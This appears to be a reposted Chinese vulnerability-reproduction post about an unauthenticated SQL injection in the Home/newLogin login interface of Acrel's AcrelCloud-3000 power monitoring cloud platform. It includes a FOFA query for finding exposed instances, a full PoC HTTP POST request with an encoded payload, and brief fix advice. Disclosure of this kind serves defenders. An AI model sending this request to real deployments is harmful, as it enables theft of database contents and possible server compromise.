安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

admin 2024年12月3日13:30:16评论23 views字数 1162阅读3分52秒阅读模式

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

点击箭头处“蓝色字”,关注我们哦!!

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

产品简介

AcrelCloud-3000环保用电监管云平台依托创新的物联网电力传感技术,实时采集企业总用电、生产设备及环保治理设备用电数据,通过关联分析、超限分析、停电分析、停限产分析,结合及时发现环保治理设备未开启、异常关闭及减速、空转、降频等异常情况,同时通过数据分析还可以实时监控限产和停产整治企业运行状态,用户可以利用PC、手机、平板电脑等多种终端实现对平台的访问。

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

漏洞概述

安科瑞环保用电监管云平台 Home/newLogin 登录接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

复现环境

FOFA:body="myCss/phone.css"

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

漏洞复现

PoC

POST /Home/newLogin HTTP/1.1

Host:

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Priority: u=0

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0

Content-Length: 193

data=AmILgROn2omEYq%2Bd8Urox8DW%2F8rRQwsBzOEz00K3cyMY1DhHq6oDzKni9uNo6p7VIuEZBk0edl%2Blr8MukZeYaoj5ogyFWf1wJQ6iDSwIHOKSdk2%2BRRo%2FbhB70T5AlQ3PB6Ca1I6PvvVefK%2BuEF6b%2BqnvUH5y0gix7tq3yw1WJdc%3D

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

文章来源:网络

公众号“河北镌远网络科技有限公司”所发表内容注明来源的,版权归原出处所有(无法查证版权的或者未注明出处的均来自网络,系转载,转载的目的在于传递更多信息,版权属于原作者。如有侵权,请联系,小编会第一时间删除处理。

原文始发于微信公众号(河北镌远网络科技有限公司):【漏洞复现】安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月3日13:30:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现http://cn-sec.com/archives/3451517.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息